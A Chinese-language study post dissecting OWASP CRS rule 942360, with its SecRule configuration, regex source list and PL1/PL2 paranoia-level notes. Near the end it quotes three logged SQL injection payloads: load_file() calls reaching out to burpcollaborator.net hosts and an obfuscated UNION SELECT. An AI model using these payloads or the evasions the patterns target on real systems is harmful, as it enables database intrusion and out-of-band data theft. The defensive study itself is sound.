防护规则学习之SQL注入
- 攻击类型:注入攻击
- ruleid: 942360
规则配置文件
我直接从github下载了owasp-modsecurity-crs-3.3的源码。
规则配置文件位于:F:\学习资料\owasp-modsecurity-crs-3.3-dev\owasp-modsecurity-crs-3.3-dev\rules\REQUEST-942-APPLICATION-ATTACK-SQLI.conf
点击展开ruleid=942360的配置内容
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42 This rule has a stricter sibling: 942361.
The keywords 'alter' and 'union' led to false positives.
Therefore they have been moved to PL2 and the keywords have been extended on PL1.
# Sources for SQL ALTER statements:
MySQL: https://dev.mysql.com/doc/refman/5.7/en/sql-syntax-data-definition.html
Oracle/PLSQL: https://docs.oracle.com/apps/search/search.jsp?q=alter&size=60&category=database
PostgreQSL: https://www.postgresql.org/search/?u=%2Fdocs&q=alter
MSSQL: https://docs.microsoft.com/en-us/sql/t-sql/statements/statements
DB2: https://www.ibm.com/support/knowledgecenter/en/search/alter?scope=SSEPGG_9.5.0
# Regexp generated from util/regexp-assemble/regexp-942360.data using Regexp::Assemble.
To rebuild the regexp:
cd util/regexp-assemble
./regexp-assemble.pl regexp-942360.data
Note that after assemble an outer bracket with an ignore case flag is added
to the Regexp::Assemble output:
(?i:ASSEMBLE_OUTPUT)
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:^[\W\d]+\s*?(?:(?:alter\s*(?:a(?:(?:pplication\s*rol|ggregat)e|s(?:ymmetric\s*ke|sembl)y|u(?:thorization|dit)|vailability\s*group)|c(?:r(?:yptographic\s*provider|edential)|o(?:l(?:latio|um)|nversio)n|ertificate|luster)|s(?:e(?:rv(?:ice|er)|curity|quence|ssion|arch)|y(?:mmetric\s*key|nonym)|togroup|chema)|m(?:a(?:s(?:ter\s*key|k)|terialized)|e(?:ssage\s*type|thod)|odule)|l(?:o(?:g(?:file\s*group|in)|ckdown)|a(?:ngua|r)ge|ibrary)|t(?:(?:abl(?:espac)?|yp)e|r(?:igger|usted)|hreshold|ext)|p(?:a(?:rtition|ckage)|ro(?:cedur|fil)e|ermission)|d(?:i(?:mension|skgroup)|atabase|efault|omain)|r(?:o(?:l(?:lback|e)|ute)|e(?:sourc|mot)e)|f(?:u(?:lltext|nction)|lashback|oreign)|e(?:xte(?:nsion|rnal)|(?:ndpoi|ve)nt)|in(?:dex(?:type)?|memory|stance)|b(?:roker\s*priority|ufferpool)|x(?:ml\s*schema|srobject)|w(?:ork(?:load)?|rapper)|hi(?:erarchy|stogram)|o(?:perator|utline)|(?:nicknam|queu)e|us(?:age|er)|group|java|view)|u(?:nion\s*(?:(?:distin|sele)ct|all)|pdate)|(?:truncat|renam)e|(?:inser|selec)t|de(?:lete|sc)|load)\b|create\s+\w+)|(?:(?:(?:trunc|cre|upd)at|renam)e|(?:inser|selec)t|de(?:lete|sc)|alter|load)\s+(?:group_concat|load_file|char)\s?\(?|[\d\W]\s+as\b\s*[\"'`\w]+\s*\bfrom|[\s(]load_file\s*?\(|[\"'`]\s+regexp\W|end\s*?\);))" \
"id:942360,\
phase:2,\
block,\
capture,\
t:none,t:urlDecodeUni,\
msg:'Detects concatenated basic SQL injection and SQLLFI attempts',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-sqli',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
tag:'WASCTC/WASC-19',\
tag:'OWASP_TOP_10/A1',\
tag:'OWASP_AppSensor/CIE1',\
tag:'PCI/6.5.2',\
ver:'OWASP_CRS/3.2.0',\
severity:'CRITICAL',\
setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
这条规则的正则表达式由F:\学习资料\owasp-modsecurity-crs-3.3-dev\owasp-modsecurity-crs-3.3-dev\util\regexp-assemble\regexp-942360.data生成:
点击展开regexp-942360.data
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134alter\s+char\s?[(]?
alter\s+group_concat\s?[(]?
alter\s+load_file\s?[(]?
create\s+char\s?[(]?
create\s+group_concat\s?[(]?
create\s+load_file\s?[(]?
delete\s+char\s?[(]?
delete\s+group_concat\s?[(]?
delete\s+load_file\s?[(]?
desc\s+char\s?[(]?
desc\s+group_concat\s?[(]?
desc\s+load_file\s?[(]?
insert\s+char\s?[(]?
insert\s+group_concat\s?[(]?
insert\s+load_file\s?[(]?
load\s+char\s?[(]?
load\s+group_concat\s?[(]?
load\s+load_file\s?[(]?
rename\s+char\s?[(]?
rename\s+group_concat\s?[(]?
rename\s+load_file\s?[(]?
select\s+char\s?[(]?
select\s+group_concat\s?[(]?
select\s+load_file\s?[(]?
truncate\s+char\s?[(]?
truncate\s+group_concat\s?[(]?
truncate\s+load_file\s?[(]?
update\s+char\s?[(]?
update\s+group_concat\s?[(]?
update\s+load_file\s?[(]?
end\s*?\);
[\s(]load_file\s*?\(
[\"'`]\s+regexp\W
[\d\W]\s+as\b\s*[\"'`\w]+\s*\bfrom
^[\W\d]+\s*?create\s+\w+
^[\W\d]+\s*?delete\b
^[\W\d]+\s*?desc\b
^[\W\d]+\s*?insert\b
^[\W\d]+\s*?load\b
^[\W\d]+\s*?rename\b
^[\W\d]+\s*?select\b
^[\W\d]+\s*?truncate\b
^[\W\d]+\s*?update\b
^[\W\d]+\s*?alter\s*aggregate\b
^[\W\d]+\s*?alter\s*application\s*role\b
^[\W\d]+\s*?alter\s*assembly\b
^[\W\d]+\s*?alter\s*asymmetric\s*key\b
^[\W\d]+\s*?alter\s*audit\b
^[\W\d]+\s*?alter\s*authorization\b
^[\W\d]+\s*?alter\s*availability\s*group\b
^[\W\d]+\s*?alter\s*broker\s*priority\b
^[\W\d]+\s*?alter\s*bufferpool\b
^[\W\d]+\s*?alter\s*certificate\b
^[\W\d]+\s*?alter\s*cluster\b
^[\W\d]+\s*?alter\s*collation\b
^[\W\d]+\s*?alter\s*column\b
^[\W\d]+\s*?alter\s*conversion\b
^[\W\d]+\s*?alter\s*credential\b
^[\W\d]+\s*?alter\s*cryptographic\s*provider\b
^[\W\d]+\s*?alter\s*database\b
^[\W\d]+\s*?alter\s*default\b
^[\W\d]+\s*?alter\s*dimension\b
^[\W\d]+\s*?alter\s*diskgroup\b
^[\W\d]+\s*?alter\s*domain\b
^[\W\d]+\s*?alter\s*endpoint\b
^[\W\d]+\s*?alter\s*extension\b
^[\W\d]+\s*?alter\s*external\b
^[\W\d]+\s*?alter\s*event\b
^[\W\d]+\s*?alter\s*flashback\b
^[\W\d]+\s*?alter\s*foreign\b
^[\W\d]+\s*?alter\s*fulltext\b
^[\W\d]+\s*?alter\s*function\b
^[\W\d]+\s*?alter\s*hierarchy\b
^[\W\d]+\s*?alter\s*group\b
^[\W\d]+\s*?alter\s*histogram\b
^[\W\d]+\s*?alter\s*index\b
^[\W\d]+\s*?alter\s*indextype\b
^[\W\d]+\s*?alter\s*inmemory\b
^[\W\d]+\s*?alter\s*instance\b
^[\W\d]+\s*?alter\s*java\b
^[\W\d]+\s*?alter\s*language\b
^[\W\d]+\s*?alter\s*large\b
^[\W\d]+\s*?alter\s*library\b
^[\W\d]+\s*?alter\s*lockdown\b
^[\W\d]+\s*?alter\s*logfile\s*group\b
^[\W\d]+\s*?alter\s*login\b
^[\W\d]+\s*?alter\s*mask\b
^[\W\d]+\s*?alter\s*master\s*key\b
^[\W\d]+\s*?alter\s*materialized\b
^[\W\d]+\s*?alter\s*message\s*type\b
^[\W\d]+\s*?alter\s*method\b
^[\W\d]+\s*?alter\s*module\b
^[\W\d]+\s*?alter\s*nickname\b
^[\W\d]+\s*?alter\s*operator\b
^[\W\d]+\s*?alter\s*outline\b
^[\W\d]+\s*?alter\s*package\b
^[\W\d]+\s*?alter\s*partition\b
^[\W\d]+\s*?alter\s*permission\b
^[\W\d]+\s*?alter\s*procedure\b
^[\W\d]+\s*?alter\s*profile\b
^[\W\d]+\s*?alter\s*queue\b
^[\W\d]+\s*?alter\s*remote\b
^[\W\d]+\s*?alter\s*resource\b
^[\W\d]+\s*?alter\s*role\b
^[\W\d]+\s*?alter\s*rollback\b
^[\W\d]+\s*?alter\s*route\b
^[\W\d]+\s*?alter\s*schema\b
^[\W\d]+\s*?alter\s*search\b
^[\W\d]+\s*?alter\s*security\b
^[\W\d]+\s*?alter\s*server\b
^[\W\d]+\s*?alter\s*service\b
^[\W\d]+\s*?alter\s*sequence\b
^[\W\d]+\s*?alter\s*session\b
^[\W\d]+\s*?alter\s*symmetric\s*key\b
^[\W\d]+\s*?alter\s*synonym\b
^[\W\d]+\s*?alter\s*stogroup\b
^[\W\d]+\s*?alter\s*table\b
^[\W\d]+\s*?alter\s*tablespace\b
^[\W\d]+\s*?alter\s*text\b
^[\W\d]+\s*?alter\s*threshold\b
^[\W\d]+\s*?alter\s*trigger\b
^[\W\d]+\s*?alter\s*trusted\b
^[\W\d]+\s*?alter\s*type\b
^[\W\d]+\s*?alter\s*usage\b
^[\W\d]+\s*?alter\s*user\b
^[\W\d]+\s*?alter\s*view\b
^[\W\d]+\s*?alter\s*work\b
^[\W\d]+\s*?alter\s*workload\b
^[\W\d]+\s*?alter\s*wrapper\b
^[\W\d]+\s*?alter\s*xml\s*schema\b
^[\W\d]+\s*?alter\s*xsrobject\b
^[\W\d]+\s*?union\s*all\b
^[\W\d]+\s*?union\s*select\b
^[\W\d]+\s*?union\s*distinct\b
这条规则提到了一个概念PL1和PL2。google了一下,原来是这样的
在异常评分模式中,CRS包含规则等级(Paranoia)、异常阈值(Anomaly)两个量化值,随着规则等级越来越高,其所启用的安全防御规则就越来越多,同时误报也会越来越多,规则等级分为以下几类,规则等级高于PL2在审计日志中会输出规则等级标签:
- 1(PL1),默认风险等级,启用了大部分防御规则,误报较少
- 2(PL2),比 PL1 启用更多防御规则,例如基于正则的 SQL 注入和 XSS,比 PL1 误报多
- 3(PL3),比 PL2 启用更多防御规则,面向经验丰富用户,满足较高安全性场景
- 4(PL4),最严格的风险等级,会产生一定数量的误报
基于异常告警模式,每条检测规则都包含一定的风险值,不同危害风险值不同,如下所示,可根据业务场景自主调整: - CRITICAL,致命,风险值为 5
- ERROR,错误,风险值为 4
- WARNING,警告,风险值为 3
- NOTICE,通知,风险值为 2
这条规则,也告诉我们alter和union对应的正则匹配容易误报。msg:'Detects concatenated basic SQL injection and SQLLFI attempts'这条规则用于检测连接类SQL注入和SQLLFI尝试。
实例
- 例子1:匹配的变量是参数名称(ARGS_NAMES),匹配的数据是
1
Matched Data: 1' (select found within ARGS_NAMES:1'+(select load_file('\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5cbm1n3x0mqhp9aerbe1qga1kz4qagy71vvil6a.burpcollaborator.net\x5c\x5c\x5c\x5cumz'))+': 1' (select load_file('\x5c\x5c\x5c\x5cbm1n3x0mqhp9aerbe1qga1kz4qagy71vvil6a.burpcollaborator.net\x5c\x5cumz')) '
1' (select。
- 例子2:匹配的变量是请求COOKIE(REQUEST_COOKIES),匹配的数据是
1
Matched Data: select load_file( found within REQUEST_COOKIES:JSESSIONID: BF1261B18F17E3A1B16BACE4B6055F35'+(select load_file('\x5c\x5c\x5c\x5cpha1ybv0lvkn5smp9flu5ffdz45utlw9pwfk4.burpcollaborator.net\x5c\x5clpy'))+'
select load_file(。
- 例子3:匹配的变量是post提交的参数(ARGS),参数名称是
1
Matched Data: -1\x22)UnIoN found within ARGS:kw: -1\x22)UnIoN/**/AlL/**/SeLeCt/**/1,2,3,Md5(1234),5,6,7#
kw,匹配的数据是-1\x22)UnIoN。
总结
这条规则就相对复杂很多了。
